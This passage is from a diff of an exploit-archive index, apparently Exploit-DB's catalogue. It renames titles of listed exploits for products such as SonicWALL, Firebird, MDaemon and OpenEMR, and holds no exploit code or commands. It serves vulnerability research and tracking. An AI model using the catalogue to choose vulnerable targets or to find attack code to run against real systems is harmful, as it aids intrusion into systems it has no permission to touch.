Malformed Web Authorization Request Denial of Service (2)",2004-03-02,shaun2k2,hardware,dos,0 +23788,platforms/hardware/dos/23788.pl,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (1)",2004-03-02,"Vasco Costa",hardware,dos,0 +23789,platforms/hardware/dos/23789.c,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (2)",2004-03-02,shaun2k2,hardware,dos,0 23790,platforms/windows/remote/23790.htm,"Microsoft Internet Explorer 5 - window.open Search Pane Cross-Zone Scripting",2003-09-10,"Liu Die Yu",windows,remote,0 23791,platforms/asp/webapps/23791.txt,"SpiderSales 2.0 Shopping Cart - Multiple Vulnerabilities",2004-03-03,"Nick Gudov",asp,webapps,0 23792,platforms/php/webapps/23792.txt,"VirtuaSystems VirtuaNews 1.0.x - Multiple Module Cross-Site Scripting Vulnerabilities",2004-03-05,"Rafel Ivgi The-Insider",php,webapps,0 @@ -21220,7 +21220,7 @@ id,file,description,date,author,platform,type,port 24021,platforms/windows/remote/24021.rb,"Honeywell Tema Remote Installer - ActiveX Remote Code Execution",2013-01-10,Metasploit,windows,remote,0 24022,platforms/windows/dos/24022.txt,"Nero MediaHome 4.5.8.0 - Denial of Service",2013-01-10,"High-Tech Bridge SA",windows,dos,0 24023,platforms/hardware/dos/24023.py,"Colloquy 1.3.5 / 1.3.6 - Denial of Service",2013-01-10,UberLame,hardware,dos,0 -24024,platforms/windows/remote/24024.html,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload and Execution",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 +24024,platforms/windows/remote/24024.html,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload / Execution",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 24025,platforms/windows/remote/24025.txt,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Information Disclosure",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 24026,platforms/php/webapps/24026.txt,"phpBB 2.0.x - album_portal.php Remote File Inclusion",2004-04-19,Officerrr,php,webapps,0 24027,platforms/linux/local/24027.txt,"UTempter 0.5.x - Multiple Local Vulnerabilities",2004-04-19,"Steve Grubb",linux,local,0 @@ -21357,7 +21357,7 @@ id,file,description,date,author,platform,type,port 24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - showperf.asp title Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0 24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - showini.asp Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0 24164,platforms/cgi/webapps/24164.txt,"Rit Research Labs TinyWeb 1.9.2 - Unauthorized Script Disclosure",2004-06-01,"Ziv Kamir",cgi,webapps,0 -24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0 +24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0 24166,platforms/php/webapps/24166.txt,"PHP-Nuke 5.x/6.x/7.x - Direct Script Access Security Bypass",2004-06-01,Squid,php,webapps,0 24167,platforms/php/webapps/24167.txt,"SquirrelMail 1.2.x - From Email Header HTML Injection",2004-06-03,anonymous,php,webapps,0 24168,platforms/php/webapps/24168.txt,"Mail Manage EX 3.1.8 MMEX - Script Settings Parameter Remote PHP File Inclusion",2004-06-03,"The Warlock [BhQ]",php,webapps,0 @@ -21393,7 +21393,7 @@ id,file,description,date,author,platform,type,port 24202,platforms/hardware/webapps/24202.txt,"linksys wrt54gl firmware 4.30.15 build 2 - Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps,0 24203,platforms/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Root/SYSTEM Exploit",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 -24205,platforms/linux/remote/24205.txt,"Novell NCP - Pre-Authentication Remote Root Exploit",2013-01-18,"Gary Nilson",linux,remote,0 +24205,platforms/linux/remote/24205.txt,"Novell NCP - Unauthenticated Remote Root Exploit",2013-01-18,"Gary Nilson",linux,remote,0 24230,platforms/hardware/remote/24230.txt,"BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure",2004-06-22,"Konstantin V. Gavrilenko",hardware,remote,0 24206,platforms/multiple/remote/24206.rb,"Jenkins CI Script Console - Command Execution (Metasploit)",2013-01-18,"Spencer McIntyre",multiple,remote,0 24207,platforms/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Exploit",2013-01-18,"Jon Bailey",windows,local,0 @@ -21491,7 +21491,7 @@ id,file,description,date,author,platform,type,port 24299,platforms/asp/webapps/24299.pl,"NetSupport DNA HelpDesk 1.0 Problist Script - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0 24300,platforms/asp/webapps/24300.pl,"Leigh Business Enterprises Web HelpDesk 4.0 - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0 24301,platforms/php/webapps/24301.html,"Mensajeitor Tag Board 1.x - Authentication Bypass",2004-07-21,"Jordi Corrales",php,webapps,0 -24302,platforms/asp/webapps/24302.pl,"Polar Helpdesk 3.0 - Cookie Based Authentication System Bypass",2004-07-21,"Noam Rathaus",asp,webapps,0 +24302,platforms/asp/webapps/24302.pl,"Polar Helpdesk 3.0 - Cookie Based Authentication Bypass",2004-07-21,"Noam Rathaus",asp,webapps,0 24303,platforms/php/webapps/24303.txt,"Layton Technology HelpBox 3.0.1 - Multiple SQL Injections",2004-07-21,"Noam Rathaus",php,webapps,0 24304,platforms/windows/remote/24304.txt,"Imatix Xitami 2.5 - Server Side Includes Cross-Site Scripting",2004-07-22,"Oliver Karow",windows,remote,0 24305,platforms/multiple/dos/24305.txt,"PSCS VPOP3 2.0 - Email Server Remote Denial of Service",2004-07-22,dr_insane,multiple,dos,0 @@ -21659,7 +21659,7 @@ id,file,description,date,author,platform,type,port 24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 24478,platforms/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 24479,platforms/windows/remote/24479.py,"Freefloat FTP 1.0 - Raw Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0 -24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - (Post-Authentication) Remote Command Execution",2013-02-11,aeon,php,webapps,0 +24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - (Authenticated) Remote Command Execution",2013-02-11,aeon,php,webapps,0 24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x / 5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0 24483,platforms/hardware/webapps/24483.txt,"TP-Link Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0 24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0 @@ -21669,7 +21669,7 @@ id,file,description,date,author,platform,type,port 24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - (install.php) Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php id Parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 24490,platforms/windows/remote/24490.rb,"Novell Groupwise Client - gwcls1.dll ActiveX Remote Code Execution",2013-02-12,Metasploit,windows,remote,0 -24494,platforms/hardware/remote/24494.rb,"Polycom HDX - Telnet Authorization Bypass (Metasploit)",2013-02-14,"Paul Haas",hardware,remote,23 +24494,platforms/hardware/remote/24494.rb,"Polycom HDX - Telnet Authentication Bypass (Metasploit)",2013-02-14,"Paul Haas",hardware,remote,23 24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - (ofc_upload_image.php) Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0 24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)",2013-02-14,"Scott Bell",windows,remote,0 24496,platforms/windows/webapps/24496.txt,"SonicWALL Scrutinizer 9.5.2 - SQL Injection",2013-02-14,Vulnerability-Lab,windows,webapps,0 @@ -21694,7 +21694,7 @@ id,file,description,date,author,platform,type,port 24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 - Download Execute",2013-02-20,g11tch,windows,remote,0 24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,Metasploit,windows,remote,0 24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,Metasploit,windows,remote,0 -24529,platforms/php/remote/24529.rb,"OpenEMR - PHP File Upload",2013-02-20,Metasploit,php,remote,0 +24529,platforms/php/remote/24529.rb,"OpenEMR - Arbitrary .PHP File Upload",2013-02-20,Metasploit,php,remote,0 24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0 24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)",2013-02-23,Metasploit,windows,remote,0 24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script - (Authentication Bypass) SQL Injection",2013-02-21,"cr4wl3r ",php,webapps,0 @@ -21711,7 +21711,7 @@ id,file,description,date,author,platform,type,port 24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24547,platforms/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload",2013-02-26,Metasploit,php,remote,0 24548,platforms/php/remote/24548.rb,"Glossword 1.8.8 & 1.8.12 - Arbitrary File Upload",2013-02-26,Metasploit,php,remote,0 -24549,platforms/php/remote/24549.rb,"PolarPearCMS - PHP File Upload",2013-02-26,Metasploit,php,remote,0 +24549,platforms/php/remote/24549.rb,"PolarPearCMS - Arbitrary .PHP File Upload",2013-02-26,Metasploit,php,remote,0 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0 24551,platforms/php/webapps/24551.txt,"Joomla! 3.0.2 - (highlight.php) PHP Object Injection",2013-02-27,EgiX,php,webapps,0 24552,platforms/php/webapps/24552.txt,"WordPress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0 @@ -21752,7 +21752,7 @@ id,file,description,date,author,platform,type,port 24587,platforms/php/webapps/24587.txt,"PostNuke Modules Factory Subjects Module 2.0 - SQL Injection",2004-09-10,Criolabs,php,webapps,0 24588,platforms/asp/webapps/24588.txt,"GetSolutions GetIntranet 2.2 - Multiple Remote Input Validation Vulnerabilities",2004-09-10,Criolabs,asp,webapps,0 24589,platforms/asp/webapps/24589.txt,"GetSolutions GetInternet - Multiple SQL Injections",2004-09-10,Criolabs,asp,webapps,0 -24590,platforms/linux/dos/24590.txt,"Apache 2.0.x - mod_ssl Remote Denial of Service",2004-09-10,"M. ""Alex"" Hankins",linux,dos,0 +24590,platforms/linux/dos/24590.txt,"Apache/mod_ssl 2.0.x - Remote Denial of Service",2004-09-10,"M. ""Alex"" Hankins",linux,dos,0 24591,platforms/cgi/webapps/24591.txt,"PerlDesk Language Variable - Server-Side Script Execution",2004-09-13,"Nikyt0x Argentina",cgi,webapps,0 24592,platforms/multiple/dos/24592.txt,"Pingtel Xpressa 1.2.x/2.0/2.1 - Handset Remote Denial of Service",2004-09-13,@stake,multiple,dos,0 24593,platforms/unix/dos/24593.txt,"QNX Photon phrelay-cfg - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 @@ -22315,7 +22315,7 @@ id,file,description,date,author,platform,type,port 25158,platforms/php/webapps/25158.txt,"OOApp Guestbook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,php,webapps,0 25159,platforms/jsp/webapps/25159.txt,"cyclades alterpath manager 1.1 - Multiple Vulnerabilities",2005-02-24,sullo@cirt.net,jsp,webapps,0 25160,platforms/php/webapps/25160.txt,"PunBB 3.0/3.1 - Multiple Remote Input Validation Vulnerabilities",2005-02-24,"John Gumbel",php,webapps,0 -25161,platforms/php/webapps/25161.txt,"phpWebSite 0.x - Image File Processing Arbitrary PHP File Upload",2005-02-24,tjomka,php,webapps,0 +25161,platforms/php/webapps/25161.txt,"phpWebSite 0.x - Image File Processing Arbitrary .PHP File Upload",2005-02-24,tjomka,php,webapps,0 25162,platforms/php/webapps/25162.txt,"CubeCart 2.0.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-25,Lostmon,php,webapps,0 25163,platforms/windows/remote/25163.txt,"CIS WebServer 3.5.13 - Directory Traversal",2005-02-25,CorryL,windows,remote,0 25164,platforms/linux/dos/25164.txt,"Gaim 1.1.3 - File Download Denial of Service",2005-02-25,"Randall Perry",linux,dos,0 @@ -22394,7 +22394,7 @@ id,file,description,date,author,platform,type,port 25250,platforms/php/webapps/25250.txt,"OpenDocMan 1.2.6.5 - Persistent Cross-Site Scripting",2013-05-06,drone,php,webapps,0 25251,platforms/hardware/webapps/25251.txt,"D-Link DSL-320B - Multiple Vulnerabilities",2013-05-06,m-1-k-3,hardware,webapps,0 25252,platforms/asp/webapps/25252.txt,"BetaParticle blog 2.0/3.0 - dbBlogMX.mdb Direct Request Database Disclosure",2005-03-21,"farhad koosha",asp,webapps,0 -25253,platforms/asp/webapps/25253.txt,"BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated File Upload",2005-03-21,"farhad koosha",asp,webapps,0 +25253,platforms/asp/webapps/25253.txt,"BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated Arbitrary File Upload",2005-03-21,"farhad koosha",asp,webapps,0 25254,platforms/asp/webapps/25254.txt,"BetaParticle blog 2.0/3.0 - myFiles.asp Unauthenticated File Manipulation",2005-03-21,"farhad koosha",asp,webapps,0 25255,platforms/windows/dos/25255.txt,"FUN labs Game Engine - Multiple Remote Denial of Service Vulnerabilities",2005-03-20,"Luigi Auriemma",windows,dos,0 25256,platforms/osx/local/25256.c,"Apple Mac OSX 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0 @@ -22465,7 +22465,7 @@ id,file,description,date,author,platform,type,port 25322,platforms/linux/dos/25322.c,"Linux Kernel 2.6.10 - File Lock Local Denial of Service",2005-03-30,ChoiX,linux,dos,0 25323,platforms/php/webapps/25323.txt,"InterAKT Online MX Shop 1.1.1 - SQL Injection",2005-03-31,Dcrab,php,webapps,0 25324,platforms/asp/webapps/25324.txt,"ASP-DEV XM Forum RC3 - IMG Tag Script Injection",2005-03-31,Zinho,asp,webapps,0 -25325,platforms/windows/remote/25325.txt,"BlueSoleil 1.4 - Object Push Service BlueTooth File Upload Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote,0 +25325,platforms/windows/remote/25325.txt,"BlueSoleil 1.4 - Object Push Service BlueTooth Arbitrary File Upload / Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote,0 25326,platforms/windows/dos/25326.txt,"RUMBA 7.3/7.4 - Profile Handling Multiple Buffer Overflow Vulnerabilities",2005-04-01,"Bahaa Naamneh",windows,dos,0 25327,platforms/php/webapps/25327.txt,"Alstrasoft EPay Pro 2.0 - Remote File Inclusion",2005-04-01,Dcrab,php,webapps,0 25328,platforms/php/webapps/25328.txt,"Alstrasoft EPay Pro 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-04-01,Dcrab,php,webapps,0 @@ -23548,7 +23548,7 @@ id,file,description,date,author,platform,type,port 26419,platforms/linux/remote/26419.rb,"ZPanel 10.0.0.2 - htpasswd Module 'Username' Command Execution",2013-06-24,Metasploit,linux,remote,0 26420,platforms/windows/remote/26420.rb,"HP System Management Homepage - JustGetSNMPQueue Command Injection",2013-06-24,Metasploit,windows,remote,2381 26421,platforms/php/remote/26421.rb,"LibrettoCMS File Manager - Arbitrary File Upload",2013-06-24,Metasploit,php,remote,0 -26422,platforms/linux/remote/26422.rb,"MoinMoin - twikidraw Action Traversal File Upload",2013-06-24,Metasploit,linux,remote,0 +26422,platforms/linux/remote/26422.rb,"MoinMoin - twikidraw Action Traversal Arbitrary File Upload",2013-06-24,Metasploit,linux,remote,0 26423,platforms/php/webapps/26423.txt,"Mantis 0.19.2/1.0 - Bug_sponsorship_list_view_inc.php File Inclusion",2005-10-26,"Andreas Sandblad",php,webapps,0 26424,platforms/windows/remote/26424.txt,"Snoopy 0.9x/1.0/1.2 - Arbitrary Command Execution",2005-10-26,"D. Fabian",windows,remote,0 26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x - Info-DB Info_db.php Multiple SQL Injection",2005-10-26,admin@batznet.com,php,webapps,0 @@ -24793,7 +24793,7 @@ id,file,description,date,author,platform,type,port 27696,platforms/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 - imessage.cgi 'Username' Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 27697,platforms/cgi/webapps/27697.txt,"Net Clubs Pro 4.0 - login.cgi Password Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 28055,platforms/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps,0 -28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Pre-Authentication Heap Corruption",2013-09-03,kingcope,hardware,remote,0 +28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Unauthenticated Heap Corruption",2013-09-03,kingcope,hardware,remote,0 28057,platforms/php/webapps/28057.txt,"Cline Communications - Multiple SQL Injections",2006-06-17,Liz0ziM,php,webapps,0 28058,platforms/php/webapps/28058.txt,"Eduha Meeting - 'index.php' Arbitrary File Upload",2006-06-19,Liz0ziM,php,webapps,0 28061,platforms/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x - Web Interface ccmadmin/phonelist.asp pattern Parameter Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 @@ -25012,7 +25012,7 @@ id,file,description,date,author,platform,type,port 27911,platforms/php/webapps/27911.txt,"vCard 2.9 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,black-code,php,webapps,0 27912,platforms/php/webapps/27912.txt,"CoolPHP - 'index.php' Cross-Site Scripting",2006-05-27,black-code,php,webapps,0 27913,platforms/asp/webapps/27913.txt,"Mini-NUKE 2.3 - Your_Account.asp Multiple SQL Injection",2006-05-29,"Mustafa Can Bjorn",asp,webapps,0 -27914,platforms/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - Remote Pre-Authentication IMAP Buffer Overflow",2006-05-29,kcope,windows,dos,0 +27914,platforms/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - Remote Unauthenticated IMAP Buffer Overflow",2006-05-29,kcope,windows,dos,0 27915,platforms/multiple/dos/27915.pl,"Apache James 2.2 - SMTP Denial of Service",2006-05-29,y3dips,multiple,dos,0 27916,platforms/php/webapps/27916.txt,"Photoalbum B&W 1.3 - 'index.php' Cross-Site Scripting",2006-05-29,black-code,php,webapps,0 27917,platforms/php/webapps/27917.txt,"TikiWiki 1.9 - tiki-lastchanges.php Multiple Parameter Cross-Site Scripting",2006-05-29,Blwood,php,webapps,0 @@ -25268,7 +25268,7 @@ id,file,description,date,author,platform,type,port 28205,platforms/php/webapps/28205.txt,"FlexWATCH Network Camera - Cross-Site Scripting",2006-06-11,"Jaime Blasco",php,webapps,0 28206,platforms/php/webapps/28206.txt,"Fantastic Guestbook 2.0.1 - Guestbook.php HTML Injection",2006-07-11,omnipresent,php,webapps,0 28207,platforms/windows/dos/28207.txt,"Microsoft Internet Explorer 6 - TriEditDocument Denial of Service",2006-07-11,hdm,windows,dos,0 -28208,platforms/asp/webapps/28208.txt,"FlexWATCH 3.0 - AIndex.asp Authorization Bypass",2006-07-12,"Jaime Blasco",asp,webapps,0 +28208,platforms/asp/webapps/28208.txt,"FlexWATCH 3.0 - AIndex.asp Authentication Bypass",2006-07-12,"Jaime Blasco",asp,webapps,0 28209,platforms/multiple/remote/28209.txt,"FLV Players 8 - player.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 28210,platforms/multiple/remote/28210.txt,"FLV Players 8 - popup.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 28211,platforms/php/webapps/28211.txt,"Lazarus Guestbook 1.6 - codes-english.php show Parameter Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 @@ -25390,8 +25390,8 @@ id,file,description,date,author,platform,type,port 28333,platforms/unix/remote/28333.rb,"D-Link Devices - UPnP SOAP TelnetD Command Execution",2013-09-17,Metasploit,unix,remote,49152 28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance sblistpack - Arbitrary Command Execution",2013-09-17,Metasploit,linux,remote,443 28335,platforms/windows/local/28335.rb,"Agnitum Outpost Internet Security - Privilege Escalation",2013-09-17,Metasploit,windows,local,0 -28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload",2013-09-17,Metasploit,windows,remote,443 -28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC - UpdateCertificatesServlet File Upload",2013-09-17,Metasploit,windows,remote,443 +28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager - SNAC UpdateDomainControllerServlet Arbitrary File Upload",2013-09-17,Metasploit,windows,remote,443 +28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC - UpdateCertificatesServlet Arbitrary File Upload",2013-09-17,Metasploit,windows,remote,443 28338,platforms/linux/dos/28338.txt,"Vino VNC Server 3.7.3 - Persistent Denial of Service",2013-09-17,"Trustwave's SpiderLabs",linux,dos,5900 28339,platforms/asp/webapps/28339.txt,"Anychart 3.0 - Password Parameter SQL Injection",2006-08-03,sCORPINo,asp,webapps,0 28340,platforms/multiple/webapps/28340.c,"PSWD.JS - Insecure Password Hash",2006-08-03,"Gianstefano Monni",multiple,webapps,0 @@ -26131,7 +26131,7 @@ id,file,description,date,author,platform,type,port 29090,platforms/asp/webapps/29090.txt,"Active News Manager - activeNews_comments.asp articleId Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29091,platforms/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution (Remote Code Execution)",2013-10-20,"Halim Cruzito",php,webapps,0 29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - search.asp search Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0 -29211,platforms/php/webapps/29211.txt,"WordPress Curvo Themes - Cross-Site Request Forgery File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0 +29211,platforms/php/webapps/29211.txt,"WordPress Curvo Themes - Cross-Site Request Forgery / Arbitrary File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0 29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds - ad.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29093,platforms/asp/webapps/29093.txt,"Texas Rankem - player.asp selPlayer Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 29094,platforms/asp/webapps/29094.txt,"Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 @@ -26561,7 +26561,7 @@ id,file,description,date,author,platform,type,port 29522,platforms/php/webapps/29522.py,"WordPress 1.x/2.0.x - Pingback SourceURI Denial of Service / Information Disclosure",2007-01-24,"Blake Matheny",php,webapps,0 29523,platforms/osx/dos/29523.txt,"Apple Mac OSX 10.4.x - Software Update Format String",2007-01-25,kf,osx,dos,0 29524,platforms/windows/remote/29524.txt,"Microsoft Word 2000 - Malformed Function Code Execution",2007-01-25,Symantec,windows,remote,0 -29525,platforms/php/webapps/29525.txt,"WordPress Highlight Premium Theme - Cross-Site Request Forgery / File Upload",2013-11-10,DevilScreaM,php,webapps,0 +29525,platforms/php/webapps/29525.txt,"WordPress Highlight Premium Theme - Cross-Site Request Forgery / Arbitrary File Upload",2013-11-10,DevilScreaM,php,webapps,0 29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0 29527,platforms/linux/remote/29527.pl,"Xine 0.99.4 - '.m3u' Remote Format String",2007-01-03,"Kevin Finisterre",linux,remote,0 29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen Safe_mode Restriction-Bypass",2007-01-26,"Maksymilian Arciemowicz",php,local,0 @@ -26580,7 +26580,7 @@ id,file,description,date,author,platform,type,port 29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 - setup.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,r00t,php,webapps,0 39839,platforms/osx/dos/39839.txt,"Apple QuickTime - MOV File Parsing Memory Corruption",2016-05-19,"Francis Provencher",osx,dos,0 29678,platforms/php/webapps/29678.txt,"Audins Audiens 3.3 - system/index.php Cookie PHPSESSID Parameter SQL Injection",2007-02-26,r00t,php,webapps,0 -29679,platforms/php/webapps/29679.html,"PHPBB2 - Admin_Ug_Auth.php Administrative Security Bypass",2007-02-26,"Hasadya Raed",php,webapps,0 +29679,platforms/php/webapps/29679.html,"PHPBB2 - Admin_Ug_Auth.php Administrative Bypass",2007-02-26,"Hasadya Raed",php,webapps,0 29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 - main.php Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0 29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 - 'index.php' Local File Inclusion",2007-02-26,"D. Matscheko",php,webapps,0 29682,platforms/php/webapps/29682.txt,"WordPress 2.1.1 - post.php Cross-Site Scripting",2007-02-26,Samenspender,php,webapps,0 @@ -26979,7 +26979,7 @@ id,file,description,date,author,platform,type,port 29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 - Level2.php Remote File Inclusion",2007-04-23,Dr.RoVeR,php,webapps,0 29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 - Init.Inc.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29880,platforms/php/webapps/29880.txt,"File117 - Multiple Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 -29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR + DEP Bypass with SANDBOX Bypass",2013-11-28,"w3bd3vil and abh1sek",windows,local,0 +29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass",2013-11-28,"w3bd3vil and abh1sek",windows,local,0 29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 - article.php SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 29883,platforms/php/webapps/29883.txt,"ACVSWS - Transport.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29884,platforms/multiple/remote/29884.txt,"Apple QuickTime 7.1.5 - QTJava toQTPointer() Java Handling Arbitrary Code Execution",2007-04-23,"Shane Macaulay",multiple,remote,0 @@ -27173,7 +27173,7 @@ id,file,description,date,author,platform,type,port 30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0 30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection",2013-12-12,GalaxyAndroid,php,webapps,0 30366,platforms/php/webapps/30366.txt,"Alstrasoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 -30244,platforms/windows/local/30244.py,"Castripper 2.50.70 - '.pls' DEP Exploit",2013-12-12,"Morteza Hashemi",windows,local,0 +30244,platforms/windows/local/30244.py,"Castripper 2.50.70 - '.pls' DEP Bypass Exploit",2013-12-12,"Morteza Hashemi",windows,local,0 30284,platforms/linux/remote/30284.vbs,"Sun Java Runtime Environment 1.6 - Web Start JNLP File Stack Buffer Overflow",2007-07-09,"Daniel Soeder",linux,remote,0 30246,platforms/php/webapps/30246.txt,"WHMCS 4.x & 5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps,0 30248,platforms/hardware/webapps/30248.txt,"Pentagram Cerberus P 6363 DSL Router - Multiple Vulnerabilities",2013-12-12,condis,hardware,webapps,0 @@ -27602,7 +27602,7 @@ id,file,description,date,author,platform,type,port 30658,platforms/php/webapps/30658.txt,"CRS Manager - Multiple Remote File Inclusion",2007-10-11,iNs,php,webapps,0 30659,platforms/php/webapps/30659.txt,"Nucleus CMS 3.0.1 - 'index.php' Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0 30660,platforms/php/webapps/30660.txt,"Scott Manktelow Design Stride 1.0 - Courses detail.php Multiple SQL Injection",2007-10-11,durito,php,webapps,0 -30661,platforms/cgi/webapps/30661.txt,"Google Urchin 5.7.3 - Report.cgi Authorization Bypass",2007-10-11,MustLive,cgi,webapps,0 +30661,platforms/cgi/webapps/30661.txt,"Google Urchin 5.7.3 - Report.cgi Authentication 